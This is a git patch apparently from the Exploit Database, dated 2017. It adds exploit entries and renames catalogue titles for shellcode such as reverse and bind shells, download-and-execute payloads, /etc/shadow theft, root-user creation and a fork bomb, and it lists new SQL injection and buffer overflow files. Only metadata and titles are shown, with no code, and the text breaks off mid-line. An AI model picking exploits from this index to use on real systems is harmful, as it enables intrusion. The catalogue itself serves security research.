From e4f4ca48ad74a3d7e523c63e7a31f93a6372af53 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 Aug 2017 05:01:20 +0000 Subject: [PATCH] DB: 2017-08-22 16 new exploits Easy DVD Creater 2.5.11 - Buffer Overflow (SEH) FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - Bind Password Shellcode (116 bytes) Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes) Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator) Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes) Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes) Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes) Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes) Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes) Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes) Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator) Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes) Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes) Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes) Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes) Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Connectback Shellcode (90 bytes) Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator) Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes) Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator) Solaris/SPARC - connect-back Shellcode (204 bytes) Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes) Win32 - Connectback + receive + save + execute Shellcode Win32 - ConnectBack + Download A File + Save + Execute Shellcode Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes) Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator) Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes) Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes) Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes) Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes) Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes) Linux/x86-64 - Connect Back Shellcode (139 bytes) Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password) Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password) Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes) Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes) Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes) Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes) Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes) Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes) Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes) Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Linux/x86_64 - kill All Processes Shellcode (19 bytes) Linux/x86_64 - Fork Bomb Shellcode (11 bytes) Apache2Triad 1.5.4 - Multiple Vulnerabilities Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection Joomla! Component Sponsor Wall 8.0 - SQL Injection PHP Classifieds Script 5.6.2 - SQL Injection Affiliate Niche Script 3.4.0 - SQL Injection PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection iTech Social Networking Script 3.08 - SQL Injection Joomla! Component FocalPoint 1.2.3 - SQL Injection Php Cloud mining Script - Authentication Bypass Joomla! Component Ajax Quiz 1.8 - SQL Injection PHP-Lance 1.52 - 'subcat' Parameter SQL Injection PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection PHPMyWind 5.3 - Cross-Site Scripting --- files.csv | 80 ++++++---- platforms/lin_x86-64/shellcode/42522.c | 63 ++++++++ platforms/lin_x86-64/shellcode/42523.c | 61 ++++++++ platforms/php/webapps/42520.txt | 208 +++++++++++++++++++++++++ platforms/php/webapps/42524.txt | 27 ++++ platforms/php/webapps/42525.txt | 27 ++++ platforms/php/webapps/42526.txt | 27 ++++ platforms/php/webapps/42527.txt | 27 ++++ platforms/php/webapps/42528.txt | 27 ++++ platforms/php/webapps/42529.txt | 29 ++++ platforms/php/webapps/42530.txt | 26 ++++ platforms/php/webapps/42531.txt | 27 ++++ platforms/php/webapps/42532.txt | 27 ++++ platforms/php/webapps/42533.txt | 27 ++++ platforms/php/webapps/42534.txt | 27 ++++ platforms/php/webapps/42535.txt | 68 ++++++++ platforms/windows/local/42521.py | 60 +++++++ 17 files changed, 806 insertions(+), 32 deletions(-) create mode 100755 platforms/lin_x86-64/shellcode/42522.c create mode 100755 platforms/lin_x86-64/shellcode/42523.c create mode 100755 platforms/php/webapps/42520.txt create mode 100755 platforms/php/webapps/42524.txt create mode 100755 platforms/php/webapps/42525.txt create mode 100755 platforms/php/webapps/42526.txt create mode 100755 platforms/php/webapps/42527.txt create mode 100755 platforms/php/webapps/42528.txt create mode 100755 platforms/php/webapps/42529.txt create mode 100755 platforms/php/webapps/42530.txt create mode 100755 platforms/php/webapps/42531.txt create mode 100755 platforms/php/webapps/42532.txt create mode 100755 platforms/php/webapps/42533.txt create mode 100755 platforms/php/webapps/42534.txt create mode 100755 platforms/php/webapps/42535.txt create mode 100755 platforms/windows/local/42521.py diff --git a/files.csv b/files.csv index fb98297ec..db63f4b47 100644 --- a/files.csv +++ b/files.csv @@ -9206,6 +9206,7 @@ id,file,description,date,author,platform,type,port 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 +42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15790,7 +15791,7 @@ id,file,description,date,author,platform,type,port 13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 -13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 +13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0 13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 @@ -15811,11 +15812,11 @@ id,file,description,date,author,platform,type,port 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 -13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 -13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 -13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 +13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,lin_x86-64,shellcode,0 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 @@ -15823,7 +15824,7 @@ id,file,description,date,author,platform,type,port 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 -13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 +13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 @@ -15847,7 +15848,7 @@ id,file,description,date,author,platform,type,port 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator (Generator)",2008-12-09,sm4x,generator,shellcode,0 -13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 +13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 @@ -15855,10 +15856,10 @@ id,file,description,date,author,platform,type,port 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 -13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 +13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0 -13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 -13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 +13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0 +13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0 13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0 13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0 13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0 @@ -15882,16 +15883,16 @@ id,file,description,date,author,platform,type,port 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0 13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 -13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 +13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0 -13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 +13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0 13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0 13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 -13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 +13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 @@ -15911,7 +15912,7 @@ id,file,description,date,author,platform,type,port 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 @@ -15919,7 +15920,7 @@ id,file,description,date,author,platform,type,port 13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Connectback Shellcode (90 bytes)",2005-12-28,xort,lin_x86,shellcode,0 +13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator)",2005-12-28,xort,lin_x86,shellcode,0 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 @@ -16009,12 +16010,12 @@ id,file,description,date,author,platform,type,port 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 -13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0 +13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)",2006-07-21,xort,solaris_sparc,shellcode,0 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 -13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-back Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 +13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 @@ -16031,7 +16032,7 @@ id,file,description,date,author,platform,type,port 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0 13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0 -13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback + receive + save + execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 +13514,platforms/win_x86/shellcode/13514.asm,"Win32 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0 13515,platforms/generator/shellcode/13515.pl,"Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0 13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0 @@ -16045,7 +16046,7 @@ id,file,description,date,author,platform,type,port 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0 -13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 